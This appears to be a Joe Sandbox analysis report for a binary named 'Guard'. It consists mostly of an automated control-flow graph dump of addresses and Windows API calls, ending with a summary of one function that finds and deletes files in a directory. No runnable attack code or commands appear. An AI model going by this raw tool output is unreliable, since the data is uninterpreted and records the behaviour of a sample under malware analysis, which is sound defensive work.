98663->98685 98666 6c410a 2 API calls 98666->98667 98667->98576 98669 6c38a8 98668->98669 98670 6c38b5 98668->98670 98671 6c410a 2 API calls 98669->98671 98670->98573 98670->98579 98671->98670 98678 6c4124 98672->98678 98673 6c41ab SetFilePointerEx 98680 6c42ae SetFilePointerEx 98673->98680 98674 7006cc 98681 6c42ae SetFilePointerEx 98674->98681 98677 7006e6 98678->98673 98678->98674 98679 6c417f 98678->98679 98679->98648 98680->98679 98681->98677 98683 6d0fe6 Mailbox 59 API calls 98682->98683 98684 6c3ca8 98683->98684 98684->98653 98684->98659 98686 6c4293 98685->98686 98690 6c422e 98685->98690 98696 6c42ae SetFilePointerEx 98686->98696 98688 6c3cf8 98688->98666 98689 6c4266 ReadFile 98689->98688 98689->98690 98690->98688 98690->98689 98692 6c410a 2 API calls 98691->98692 98693 6c41f7 98692->98693 98694 6c410a 2 API calls 98693->98694 98695 6c420b 98694->98695 98695->98667 98696->98690 98698 6d31ae 98697->98698 98699 6d3139 98697->98699 98735 6d31c0 60 API calls 3 library calls 98698->98735 98703 6d315e 98699->98703 98733 6d8d58 58 API calls __getptd_noexit 98699->98733 98702 6d31bb 98702->98251 98703->98251 98704 6d3145 98734 6d8fe6 9 API calls wcstoxq 98704->98734 98706 6d3150 98706->98251 98708 6c59fe _memset 98707->98708 98736 6c5800 98708->98736 98711 6c5a83 98713 6c5a9d Shell_NotifyIconW 98711->98713 98714 6c5ab9 Shell_NotifyIconW 98711->98714 98715 6c5aab 98713->98715 98714->98715 98740 6c56f8 98715->98740 98717 6c5ab2 98717->98251 98719 6c5b25 98718->98719 98720 6c5ad5 _memset 98718->98720 98719->98251 98721 6c5af4 Shell_NotifyIconW 98720->98721 98721->98719 98723 6b5041 98722->98723 98724 6b503c 98722->98724 98723->98251 98724->98723 98773 6d37ba 59 API calls 98724->98773 98726->98251 98728 6b4f48 98727->98728 98729 6b4f87 98727->98729 98731 6d0fe6 Mailbox 59 API calls 98728->98731 98730 6c1c9c 59 API calls 98729->98730 98732 6b4f5b 98730->98732 98731->98732 98732->98251 98733->98704 98734->98706 98735->98702 98737 6c581c 98736->98737 98738 6c5810 
98736->98738 98737->98738 98739 6c5821 DestroyIcon 98737->98739 98738->98711 98770 7134dd 62 API calls _W_store_winword 98738->98770 98739->98738 98741 6c57fa Mailbox 98740->98741 98742 6c5715 98740->98742 98741->98717 98743 6c162d 59 API calls 98742->98743 98744 6c5723 98743->98744 98745 700c4c LoadStringW 98744->98745 98746 6c5730 98744->98746 98749 700c66 98745->98749 98747 6c1821 59 API calls 98746->98747 98748 6c5745 98747->98748 98751 6c5752 98748->98751 98757 700c74 98748->98757 98750 6c1c9c 59 API calls 98749->98750 98758 6c5778 _memset _wcscpy 98750->98758 98751->98749 98752 6c5760 98751->98752 98753 6c1900 59 API calls 98752->98753 98754 6c576a 98753->98754 98755 6c17e0 59 API calls 98754->98755 98755->98758 98756 700cb7 Mailbox 98772 6d38c8 83 API calls 3 library calls 98756->98772 98757->98756 98757->98758 98759 6c1207 59 API calls 98757->98759 98760 6c57e0 Shell_NotifyIconW 98758->98760 98761 700c9e 98759->98761 98760->98741 98771 710252 60 API calls Mailbox 98761->98771 98764 700cd6 98766 6c1900 59 API calls 98764->98766 98765 700ca9 98767 6c17e0 59 API calls 98765->98767 98768 700ce7 98766->98768 98767->98756 98769 6c1900 59 API calls 98768->98769 98769->98758 98770->98711 98771->98765 98772->98764 98773->98723 98775 6b4d37 84 API calls 98774->98775 98776 72d203 98775->98776 98781 72d24a Mailbox 98776->98781 98812 72de8e 98776->98812 98778 72d617 98862 72dfb1 92 API calls Mailbox 98778->98862 98781->98263 98782 72d29b Mailbox 98782->98781 98785 6b4d37 84 API calls 98782->98785 98799 72d4a2 98782->98799 98844 71fc0d 59 API calls 2 library calls 98782->98844 98845 72d6c8 61 API calls 2 library calls 98782->98845 98783 72d626 98784 72d4b0 98783->98784 98786 72d632 98783->98786 98825 72d057 98784->98825 98785->98782 98786->98781 98791 72d4e9 98840 6d0e38 98791->98840 98794 72d503 98846 71a48d 89 API calls 4 library calls 98794->98846 98795 72d51c 98847 6b47be 98795->98847 98798 72d50e GetCurrentProcess TerminateProcess 98798->98795 98799->98778 
98799->98784 98804 72d68d 98804->98781 98808 72d6a1 FreeLibrary 98804->98808 98805 72d554 98859 72dd32 107 API calls _free 98805->98859 98808->98781 98810 72d565 98810->98804 98860 6b4230 59 API calls Mailbox 98810->98860 98861 6b523c 59 API calls 98810->98861 98863 72dd32 107 API calls _free 98810->98863 98813 6c1aa4 59 API calls 98812->98813 98814 72dea9 CharLowerBuffW 98813->98814 98864 70f903 98814->98864 98818 6c1207 59 API calls 98819 72dee2 98818->98819 98820 6c1462 59 API calls 98819->98820 98821 72def9 98820->98821 98823 6c1981 59 API calls 98821->98823 98822 72df41 Mailbox 98822->98782 98824 72df05 Mailbox 98823->98824 98824->98822 98871 72d6c8 61 API calls 2 library calls 98824->98871 98826 72d072 98825->98826 98830 72d0c7 98825->98830 98827 6d0fe6 Mailbox 59 API calls 98826->98827 98829 72d094 98827->98829 98828 6d0fe6 Mailbox 59 API calls 98828->98829 98829->98828 98829->98830 98831 72e139 98830->98831 98832 72e362 Mailbox 98831->98832 98839 72e15c _strcat _wcscpy __wsetenvp 98831->98839 98832->98791 98833 6b50d5 59 API calls 98833->98839 98834 6b502b 59 API calls 98834->98839 98835 6b5087 59 API calls 98835->98839 98836 6b4d37 84 API calls 98836->98839 98837 6d593c 58 API calls __crtLCMapStringA_stat 98837->98839 98839->98832 98839->98833 98839->98834 98839->98835 98839->98836 98839->98837 98874 715e42 61 API calls 2 library calls 98839->98874 98841 6d0e4d 98840->98841 98842 6d0ee5 Sleep 98841->98842 98843 6d0eb3 98841->98843 98842->98843 98843->98794 98843->98795 98844->98782 98845->98782 98846->98798 98848 6b47c6 98847->98848 98849 6d0fe6 Mailbox 59 API calls 98848->98849 98850 6b47d4 98849->98850 98851 6b47e0 98850->98851 98875 6b46ec 59 API calls Mailbox 98850->98875 98853 6b4540 98851->98853 98876 6b4650 98853->98876 98855 6d0fe6 Mailbox 59 API calls 98857 6b45eb 98855->98857 98856 6b454f 98856->98855 98856->98857 98857->98810 98858 6b4230 59 API calls Mailbox 98857->98858 98858->98805 98859->98810 98860->98810 98861->98810 98862->98783 
98863->98810 98865 70f92e __wsetenvp 98864->98865 98866 70f96d 98865->98866 98869 70f963 98865->98869 98870 70fa14 98865->98870 98866->98818 98866->98824 98869->98866 98872 6c14db 61 API calls 98869->98872 98870->98866 98873 6c14db 61 API calls 98870->98873 98871->98822 98872->98869 98873->98870 98874->98839 98875->98851 98877 6b4659 Mailbox 98876->98877 98878 6ed6ec 98877->98878 98883 6b4663 98877->98883 98879 6d0fe6 Mailbox 59 API calls 98878->98879 98881 6ed6f8 98879->98881 98880 6b466a 98880->98856 98882 6b5190 Mailbox 59 API calls 98882->98883 98883->98880 98883->98882 98884->98278 98885->98276 98887 714cf0 98886->98887 98888 714d09 98886->98888 98887->98888 98891 714d0f 98887->98891 98893 6d385c GetStringTypeW _iswctype 98887->98893 98894 6d37c3 59 API calls __wcstoi64 98888->98894 98891->98308 98892->98308 98893->98887 98894->98891 98895->98148 98896 6d7e83 98897 6d7e8f _wprintf 98896->98897 98933 6da038 GetStartupInfoW 98897->98933 98900 6d7e94 98935 6d8dac GetProcessHeap 98900->98935 98901 6d7eec 98902 6d7ef7 98901->98902 99018 6d7fd3 58 API calls 3 library calls 98901->99018 98936 6d9d16 98902->98936 98905 6d7efd 98907 6d7f08 __RTC_Initialize 98905->98907 99019 6d7fd3 58 API calls 3 library calls 98905->99019 98957 6dd802 98907->98957 98909 6d7f17 98910 6d7f23 GetCommandLineW 98909->98910 99020 6d7fd3 58 API calls 3 library calls 98909->99020 98976 6e5153 GetEnvironmentStringsW 98910->98976 98914 6d7f22 98914->98910 98916 6d7f3d 98917 6d7f48 98916->98917 99021 6d32e5 58 API calls 3 library calls 98916->99021 98986 6e4f88 98917->98986 98920 6d7f4e 98921 6d7f59 98920->98921 99022 6d32e5 58 API calls 3 library calls 98920->99022 99000 6d331f 98921->99000 98924 6d7f61 98925 6d7f6c __wwincmdln 98924->98925 99023 6d32e5 58 API calls 3 library calls 98924->99023 99006 6c5f8b 98925->99006 98928 6d7f80 98929 6d7f8f 98928->98929 99024 6d3588 58 API calls _doexit 98928->99024 99025 6d3310 58 API calls _doexit 98929->99025 98932 6d7f94 _wprintf 98934 6da04e 
98933->98934 98934->98900 98935->98901 99026 6d33b7 36 API calls 2 library calls 98936->99026 98938 6d9d1b 99027 6d9f6c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 98938->99027 98940 6d9d20 98941 6d9d24 98940->98941 99029 6d9fba TlsAlloc 98940->99029 99028 6d9d8c 61 API calls 2 library calls 98941->99028 98944 6d9d29 98944->98905 98945 6d9d36 98945->98941 98946 6d9d41 98945->98946 99030 6d8a05 98946->99030 98949 6d9d83 99038 6d9d8c 61 API calls 2 library calls 98949->99038 98952 6d9d62 98952->98949 98954 6d9d68 98952->98954 98953 6d9d88 98953->98905 99037 6d9c63 58 API calls 4 library calls 98954->99037 98956 6d9d70 GetCurrentThreadId 98956->98905 98958 6dd80e _wprintf 98957->98958 98959 6d9e3b __lock 58 API calls 98958->98959 98960 6dd815 98959->98960 98961 6d8a05 __calloc_crt 58 API calls 98960->98961 98963 6dd826 98961->98963 98962 6dd891 GetStartupInfoW 98970 6dd8a6 98962->98970 98973 6dd9d5 98962->98973 98963->98962 98964 6dd831 _wprintf @_EH4_CallFilterFunc@8 98963->98964 98964->98909 98965 6dda9d 99052 6ddaad LeaveCriticalSection _doexit 98965->99052 98967 6d8a05 __calloc_crt 58 API calls 98967->98970 98968 6dda22 GetStdHandle 98968->98973 98969 6dda35 GetFileType 98969->98973 98970->98967 98972 6dd8f4 98970->98972 98970->98973 98971 6dd928 GetFileType 98971->98972 98972->98971 98972->98973 99050 6da05b InitializeCriticalSectionAndSpinCount 98972->99050 98973->98965 98973->98968 98973->98969 99051 6da05b InitializeCriticalSectionAndSpinCount 98973->99051 98977 6d7f33 98976->98977 98978 6e5164 98976->98978 98982 6e4d4b GetModuleFileNameW 98977->98982 99053 6d8a4d 58 API calls 2 library calls 98978->99053 98980 6e518a _memmove 98981 6e51a0 FreeEnvironmentStringsW 98980->98981 98981->98977 98983 6e4d7f _wparse_cmdline 98982->98983 98985 6e4dbf _wparse_cmdline 98983->98985 99054 6d8a4d 58 API calls 2 library calls 98983->99054 98985->98916 98987 6e4fa1 __wsetenvp 98986->98987 98991 6e4f99 98986->98991 98988 6d8a05 __calloc_crt 58 API calls 98987->98988 
98996 6e4fca __wsetenvp 98988->98996 98989 6e5021 98990 6d2f85 _free 58 API calls 98989->98990 98990->98991 98991->98920 98992 6d8a05 __calloc_crt 58 API calls 98992->98996 98993 6e5046 98995 6d2f85 _free 58 API calls 98993->98995 98995->98991 98996->98989 98996->98991 98996->98992 98996->98993 98997 6e505d 98996->98997 99055 6e4837 58 API calls wcstoxq 98996->99055 99056 6d8ff6 IsProcessorFeaturePresent 98997->99056 98999 6e5069 98999->98920 99002 6d332b __IsNonwritableInCurrentImage 99000->99002 99079 6da701 99002->99079 99003 6d3349 __initterm_e 99004 6d2f70 __cinit 67 API calls 99003->99004 99005 6d3368 __cinit __IsNonwritableInCurrentImage 99003->99005 99004->99005 99005->98924 99007 6c5fa5 99006->99007 99017 6c6044 99006->99017 99008 6c5fdf IsThemeActive 99007->99008 99082 6d359c 99008->99082 99012 6c600b 99094 6c5f00 SystemParametersInfoW SystemParametersInfoW 99012->99094 99014 6c6017 99095 6c5240 99014->99095 99016 6c601f SystemParametersInfoW 99016->99017 99017->98928 99018->98902 99019->98907 99020->98914 99024->98929 99025->98932 99026->98938 99027->98940 99028->98944 99029->98945 99032 6d8a0c 99030->99032 99033 6d8a47 99032->99033 99035 6d8a2a 99032->99035 99039 6e5426 99032->99039 99033->98949 99036 6da016 TlsSetValue 99033->99036 99035->99032 99035->99033 99047 6da362 Sleep 99035->99047 99036->98952 99037->98956 99038->98953 99040 6e544c 99039->99040 99041 6e5431 99039->99041 99044 6e545c HeapAlloc 99040->99044 99045 6e5442 99040->99045 99049 6d35d1 DecodePointer 99040->99049 99041->99040 99042 6e543d 99041->99042 99048 6d8d58 58 API calls __getptd_noexit 99042->99048 99044->99040 99044->99045 99045->99032 99047->99035 99048->99045 99049->99040 99050->98972 99051->98973 99052->98964 99053->98980 99054->98985 99055->98996 99057 6d9001 99056->99057 99062 6d8e89 99057->99062 99061 6d901c 99061->98999 99063 6d8ea3 _memset __call_reportfault 99062->99063 99064 6d8ec3 IsDebuggerPresent 99063->99064 99070 6da385 SetUnhandledExceptionFilter 
UnhandledExceptionFilter 99064->99070 99067 6d8f87 __call_reportfault 99071 6dc826 99067->99071 99068 6d8faa 99069 6da370 GetCurrentProcess TerminateProcess 99068->99069 99069->99061 99070->99067 99072 6dc82e 99071->99072 99073 6dc830 IsProcessorFeaturePresent 99071->99073 99072->99068 99075 6e5b3a 99073->99075 99078 6e5ae9 5 API calls 2 library calls 99075->99078 99077 6e5c1d 99077->99068 99078->99077 99080 6da704 EncodePointer 99079->99080 99080->99080 99081 6da71e 99080->99081 99081->99003 99083 6d9e3b __lock 58 API calls 99082->99083 99084 6d35a7 DecodePointer EncodePointer 99083->99084 99147 6d9fa5 LeaveCriticalSection 99084->99147 99086 6c6004 99087 6d3604 99086->99087 99088 6d360e 99087->99088 99089 6d3628 99087->99089 99088->99089 99148 6d8d58 58 API calls __getptd_noexit 99088->99148 99089->99012 99091 6d3618 99149 6d8fe6 9 API calls wcstoxq 99091->99149 99093 6d3623 99093->99012 99094->99014 99096 6c524d __ftell_nolock 99095->99096 99097 6c1207 59 API calls 99096->99097 99098 6c5258 GetCurrentDirectoryW 99097->99098 99150 6c4ec8 99098->99150 99100 6c527e IsDebuggerPresent 99101 6c528c 99100->99101 99102 700b21 MessageBoxA 99100->99102 99103 700b39 99101->99103 99104 6c52a0 99101->99104 99102->99103 99258 6c314d 59 API calls Mailbox 99103->99258 99218 6c31bf 99104->99218 99108 700b49 99114 700b5f SetCurrentDirectoryW 99108->99114 99113 6c536c Mailbox 99113->99016 99114->99113 99147->99086 99148->99091 99149->99093 99151 6c1207 59 API calls 99150->99151 99152 6c4ede 99151->99152 99267 6c5420 99152->99267 99154 6c4efc 99155 6c19e1 59 API calls 99154->99155 99156 6c4f10 99155->99156 99157 6c1c9c 59 API calls 99156->99157 99158 6c4f1b 99157->99158 99281 6b477a 99158->99281 99161 6c1a36 59 API calls 99162 6c4f34 99161->99162 99163 6b39be 68 API calls 99162->99163 99164 6c4f44 Mailbox 99163->99164 99165 6c1a36 59 API calls 99164->99165 99166 6c4f68 99165->99166 99167 6b39be 68 API calls 99166->99167 99168 6c4f77 Mailbox 99167->99168 99169 6c1207 59 API calls 
99168->99169 99170 6c4f94 99169->99170 99284 6c55bc 99170->99284 99173 6d312d _W_store_winword 60 API calls 99174 6c4fae 99173->99174 99175 700a54 99174->99175 99176 6c4fb8 99174->99176 99177 6c55bc 59 API calls 99175->99177 99178 6d312d _W_store_winword 60 API calls 99176->99178 99179 700a68 99177->99179 99180 6c4fc3 99178->99180 99182 6c55bc 59 API calls 99179->99182 99180->99179 99181 6c4fcd 99180->99181 99183 6d312d _W_store_winword 60 API calls 99181->99183 99184 700a84 99182->99184 99185 6c4fd8 99183->99185 99187 6d00cf 61 API calls 99184->99187 99185->99184 99186 6c4fe2 99185->99186 99188 6d312d _W_store_winword 60 API calls 99186->99188 99189 700aa7 99187->99189 99190 6c4fed 99188->99190 99191 6c55bc 59 API calls 99189->99191 99194 6c4ff7 99190->99194 99207 700ad0 99190->99207 99192 700ab3 99191->99192 99196 6c1c9c 59 API calls 99192->99196 99193 6c501b 99201 6b47be 59 API calls 99193->99201 99194->99193 99197 6c1c9c 59 API calls 99194->99197 99195 6c55bc 59 API calls 99198 700aee 99195->99198 99199 700ac1 99196->99199 99200 6c500e 99197->99200 99202 6c1c9c 59 API calls 99198->99202 99203 6c55bc 59 API calls 99199->99203 99204 6c55bc 59 API calls 99200->99204 99205 6c502a 99201->99205 99206 700afc 99202->99206 99203->99207 99204->99193 99208 6b4540 59 API calls 99205->99208 99209 6c55bc 59 API calls 99206->99209 99207->99195 99210 6c5038 99208->99210 99211 700b0b 99209->99211 99290 6b43d0 99210->99290 99211->99211 99213 6b477a 59 API calls 99215 6c5055 99213->99215 99214 6b43d0 59 API calls 99214->99215 99215->99213 99215->99214 99216 6c55bc 59 API calls 99215->99216 99217 6c509b Mailbox 99215->99217 99216->99215 99217->99100 99219 6c31cc __ftell_nolock 99218->99219 99220 700314 _memset 99219->99220 99221 6c31e5 99219->99221 99223 700330 GetOpenFileNameW 99220->99223 99222 6d0284 60 API calls 99221->99222 99224 6c31ee 99222->99224 99225 70037f 99223->99225 99307 6d09c5 99224->99307 99227 6c1821 59 API calls 99225->99227 99229 700394 99227->99229 
99229->99229 99231 6c3203 99325 6c278a 99231->99325 99258->99108 99268 6c542d __ftell_nolock 99267->99268 99269 6c1821 59 API calls 99268->99269 99274 6c5590 Mailbox 99268->99274 99271 6c545f 99269->99271 99270 6c1609 59 API calls 99270->99271 99271->99270 99279 6c5495 Mailbox 99271->99279 99272 6c1609 59 API calls 99272->99279 99273 6c5563 99273->99274 99275 6c1a36 59 API calls 99273->99275 99274->99154 99276 6c5584 99275->99276 99278 6c4c94 59 API calls 99276->99278 99277 6c1a36 59 API calls 99277->99279 99278->99274 99279->99272 99279->99273 99279->99274 99279->99277 99299 6c4c94 99279->99299 99282 6d0fe6 Mailbox 59 API calls 99281->99282 99283 6b4787 99282->99283 99283->99161 99285 6c55df 99284->99285 99286 6c55c6 99284->99286 99288 6c1821 59 API calls 99285->99288 99287 6c1c9c 59 API calls 99286->99287 99289 6c4fa0 99287->99289 99288->99289 99289->99173 99291 6ed6c9 99290->99291 99297 6b43e7 99290->99297 99291->99297 99306 6b40cb 59 API calls Mailbox 99291->99306 99293 6b44e8 99295 6d0fe6 Mailbox 59 API calls 99293->99295 99294 6b4530 99305 6b523c 59 API calls 99294->99305 99298 6b44ef 99295->99298 99297->99293 99297->99294 99297->99298 99298->99215 99300 6c4ca2 99299->99300 99304 6c4cc4 _memmove 99299->99304 99302 6d0fe6 Mailbox 59 API calls 99300->99302 99301 6d0fe6 Mailbox 59 API calls 99303 6c4cd8 99301->99303 99302->99304 99303->99279 99304->99301 99305->99298 99306->99297 99308 6e1b70 __ftell_nolock 99307->99308 99309 6d09d2 GetLongPathNameW 99308->99309 99310 6c1821 59 API calls 99309->99310 99311 6c31f7 99310->99311 99312 6c2f3d 99311->99312 99313 6c1207 59 API calls 99312->99313 99314 6c2f4f 99313->99314 99315 6d0284 60 API calls 99314->99315 99316 6c2f5a 99315->99316 99317 6c2f65 99316->99317 99321 700177 99316->99321 99318 6c4c94 59 API calls 99317->99318 99320 6c2f71 99318->99320 99359 6b1307 99320->99359 99323 700191 99321->99323 99365 6c151f 61 API calls 99321->99365 99324 6c2f84 Mailbox 99324->99231 99366 6c49c2 99325->99366 99328 6ff8d6 99482 
719b16 122 API calls 2 library calls 99328->99482 99329 6c49c2 136 API calls 99331 6c27c3 99329->99331 99331->99328 99333 6c27cb 99331->99333 99332 6ff8e7 99334 6ff8eb 99332->99334 99335 6ff908 99332->99335 99337 6c27d7 99333->99337 99338 6ff8f3 99333->99338 99483 6c4a2f 99334->99483 99336 6d0fe6 Mailbox 59 API calls 99335->99336 99358 6ff94d Mailbox 99336->99358 99390 6c29be 99337->99390 99489 7147e8 90 API calls _wprintf 99338->99489 99342 6ff901 99342->99335 99360 6b1319 99359->99360 99364 6b1338 _memmove 99359->99364 99362 6d0fe6 Mailbox 59 API calls 99360->99362 99361 6d0fe6 Mailbox 59 API calls 99363 6b134f 99361->99363 99362->99364 99363->99324 99364->99361 99365->99321 99500 6c4b29 99366->99500 99371 6c49ed LoadLibraryExW 99510 6c4ade 99371->99510 99372 7008bb 99374 6c4a2f 84 API calls 99372->99374 99376 7008c2 99374->99376 99378 6c4ade 3 API calls 99376->99378 99379 7008ca 99378->99379 99536 6c4ab2 99379->99536 99380 6c4a14 99380->99379 99381 6c4a20 99380->99381 99383 6c4a2f 84 API calls 99381->99383 99385 6c27af 99383->99385 99385->99328 99385->99329 99387 7008f1 99542 6c4a6e 99387->99542 99389 7008fe 99391 6ffd14 99390->99391 99392 6c29e7 99390->99392 99394 6c3df7 60 API calls 99392->99394 99482->99332 99484 6c4a39 99483->99484 99486 6c4a40 99483->99486 100039 6d55c6 99484->100039 99489->99342 99547 6c4b77 99500->99547 99503 6c4b77 2 API calls 99506 6c4b50 99503->99506 99504 6c49d4 99507 6d547b 99504->99507 99505 6c4b60 FreeLibrary 99505->99504 99506->99504 99506->99505 99551 6d5490 99507->99551 99509 6c49e1 99509->99371 99509->99372 99632 6c4baa 99510->99632 99513 6c4b03 99515 6c4a05 99513->99515 99516 6c4b15 FreeLibrary 99513->99516 99514 6c4baa 2 API calls 99514->99513 99517 6c48b0 99515->99517 99516->99515 99518 6d0fe6 Mailbox 59 API calls 99517->99518 99519 6c48c5 99518->99519 99520 6c433f 59 API calls 99519->99520 99521 6c48d1 _memmove 99520->99521 99522 6c490c 99521->99522 99523 70080a 99521->99523 99524 6c4a6e 69 API calls 99522->99524 99525 
700817 99523->99525 99641 719ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99523->99641 99528 6c4915 99524->99528 99642 719f5e 95 API calls 99525->99642 99529 700859 99528->99529 99530 6c4ab2 74 API calls 99528->99530 99535 6c49a0 99528->99535 99636 6c4a8c 99528->99636 99531 6c4a8c 85 API calls 99529->99531 99530->99528 99532 700890 99531->99532 99534 6c4ab2 74 API calls 99532->99534 99534->99535 99535->99380 99537 700945 99536->99537 99538 6c4ac4 99536->99538 99748 6d5802 99538->99748 99541 7196c4 GetSystemTimeAsFileTime 99541->99387 99543 6c4a7d 99542->99543 99544 700908 99542->99544 99854 6d5e80 99543->99854 99546 6c4a85 99546->99389 99548 6c4b44 99547->99548 99549 6c4b80 LoadLibraryA 99547->99549 99548->99503 99548->99506 99549->99548 99550 6c4b91 GetProcAddress 99549->99550 99550->99548 99552 6d549c _wprintf 99551->99552 99553 6d54af 99552->99553 99555 6d54e0 99552->99555 99600 6d8d58 58 API calls __getptd_noexit 99553->99600 99570 6e0718 99555->99570 99556 6d54b4 99601 6d8fe6 9 API calls wcstoxq 99556->99601 99559 6d54e5 99560 6d54ee 99559->99560 99561 6d54fb 99559->99561 99602 6d8d58 58 API calls __getptd_noexit 99560->99602 99563 6d5525 99561->99563 99564 6d5505 99561->99564 99585 6e0837 99563->99585 99603 6d8d58 58 API calls __getptd_noexit 99564->99603 99565 6d54bf _wprintf @_EH4_CallFilterFunc@8 99565->99509 99571 6e0724 _wprintf 99570->99571 99572 6d9e3b __lock 58 API calls 99571->99572 99583 6e0732 99572->99583 99573 6e07a6 99605 6e082e 99573->99605 99574 6e07ad 99610 6d8a4d 58 API calls 2 library calls 99574->99610 99577 6e0823 _wprintf 99577->99559 99578 6e07b4 99578->99573 99611 6da05b InitializeCriticalSectionAndSpinCount 99578->99611 99580 6d9ec3 __mtinitlocknum 58 API calls 99580->99583 99582 6e07da EnterCriticalSection 99582->99573 99583->99573 99583->99574 99583->99580 99608 6d6e7d 59 API calls __lock 99583->99608 99609 6d6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 99583->99609 99586 6e0857 
__wopenfile 99585->99586 99587 6e0871 99586->99587 99599 6e0a2c 99586->99599 99618 6d39fb 60 API calls 2 library calls 99586->99618 99616 6d8d58 58 API calls __getptd_noexit 99587->99616 99589 6e0876 99617 6d8fe6 9 API calls wcstoxq 99589->99617 99591 6d5530 99604 6d5552 LeaveCriticalSection LeaveCriticalSection __wfsopen 99591->99604 99592 6e0a8f 99613 6e87d1 99592->99613 99595 6e0a25 99595->99599 99619 6d39fb 60 API calls 2 library calls 99595->99619 99597 6e0a44 99597->99599 99620 6d39fb 60 API calls 2 library calls 99597->99620 99599->99587 99599->99592 99600->99556 99601->99565 99602->99565 99603->99565 99604->99565 99612 6d9fa5 LeaveCriticalSection 99605->99612 99607 6e0835 99607->99577 99608->99583 99609->99583 99610->99578 99611->99582 99612->99607 99621 6e7fb5 99613->99621 99615 6e87ea 99615->99591 99616->99589 99617->99591 99618->99595 99619->99597 99620->99599 99622 6e7fc1 _wprintf 99621->99622 99623 6e7fd7 99622->99623 99626 6e800d 99622->99626 99624 6d8d58 wcstoxq 58 API calls 99623->99624 99625 6e7fdc 99624->99625 99627 6d8fe6 wcstoxq 9 API calls 99625->99627 99628 6e807e __wsopen_nolock 109 API calls 99626->99628 99631 6e7fe6 _wprintf 99627->99631 99629 6e8029 99628->99629 99630 6e8052 __wsopen_helper LeaveCriticalSection 99629->99630 99630->99631 99631->99615 99633 6c4af7 99632->99633 99634 6c4bb3 LoadLibraryA 99632->99634 99633->99513 99633->99514 99634->99633 99635 6c4bc4 GetProcAddress 99634->99635 99635->99633 99637 700923 99636->99637 99638 6c4a9b 99636->99638 99643 6d5a6d 99638->99643 99640 6c4aa9 99640->99528 99641->99525 99642->99528 99644 6d5a79 _wprintf 99643->99644 99645 6d5a8b 99644->99645 99647 6d5ab1 99644->99647 99674 6d8d58 58 API calls __getptd_noexit 99645->99674 99656 6d6e3e 99647->99656 99648 6d5a90 99675 6d8fe6 9 API calls wcstoxq 99648->99675 99653 6d5a9b _wprintf 99653->99640 99657 6d6e4e 99656->99657 99658 6d6e70 EnterCriticalSection 99656->99658 99657->99658 99659 6d6e56 99657->99659 99661 6d5ab7 99658->99661 99660 6d9e3b 
__lock 58 API calls 99659->99660 99660->99661 99662 6d59de 99661->99662 99663 6d59fc 99662->99663 99664 6d59ec 99662->99664 99667 6d5a12 99663->99667 99677 6d5af0 99663->99677 99747 6d8d58 58 API calls __getptd_noexit 99664->99747 99706 6d4c5d 99667->99706 99668 6d59f1 99674->99648 99675->99653 99678 6d5afd __ftell_nolock 99677->99678 99747->99668 99751 6d581d 99748->99751 99750 6c4ad5 99750->99541 99752 6d5829 _wprintf 99751->99752 99753 6d586c 99752->99753 99754 6d5864 _wprintf 99752->99754 99758 6d583f _memset 99752->99758 99755 6d6e3e __lock_file 59 API calls 99753->99755 99754->99750 99757 6d5872 99755->99757 99764 6d563d 99757->99764 99778 6d8d58 58 API calls __getptd_noexit 99758->99778 99759 6d5859 99779 6d8fe6 9 API calls wcstoxq 99759->99779 99765 6d5658 _memset 99764->99765 99770 6d5673 99764->99770 99766 6d5663 99765->99766 99765->99770 99775 6d56b3 99765->99775 99849 6d8d58 58 API calls __getptd_noexit 99766->99849 99768 6d5668 99850 6d8fe6 9 API calls wcstoxq 99768->99850 99780 6d58a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 99770->99780 99772 6d57c4 _memset 99853 6d8d58 58 API calls __getptd_noexit 99772->99853 99773 6d4906 _fprintf 58 API calls 99773->99775 99775->99770 99775->99772 99775->99773 99781 6e108b 99775->99781 99851 6e0ef8 58 API calls 3 library calls 99775->99851 99852 6e0dd7 72 API calls 4 library calls 99775->99852 99778->99759 99779->99754 99780->99754 99782 6e10ac 99781->99782 99783 6e10c3 99781->99783 99785 6d8d24 __wsopen_nolock 58 API calls 99782->99785 99784 6e17fb 99783->99784 99789 6e10fd 99783->99789 99786 6d8d24 __wsopen_nolock 58 API calls 99784->99786 99787 6e10b1 99785->99787 99790 6e1800 99786->99790 99788 6d8d58 wcstoxq 58 API calls 99787->99788 99829 6e10b8 99788->99829 99791 6e1105 99789->99791 99797 6e111c 99789->99797 99792 6d8d58 wcstoxq 58 API calls 99790->99792 99793 6d8d24 __wsopen_nolock 58 API calls 99791->99793 99794 6e1111 99792->99794 99795 6e110a 99793->99795 99796 6d8fe6 wcstoxq 9 API calls 

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 006D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006C2A58,?,00008000), ref: 006D02A4
                                                                        • Part of subcall function 00714FEC: GetFileAttributesW.KERNEL32(?,00713BFE), ref: 00714FED
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0071407C
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 007140CC
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 007140DD
                                                                      • FindClose.KERNEL32(00000000), ref: 007140F4
                                                                      • FindClose.KERNEL32(00000000), ref: 007140FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmp
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: 0c07ccfb34861574528b539fae33e7745fe9e8eda613376b717b55217b0e9792
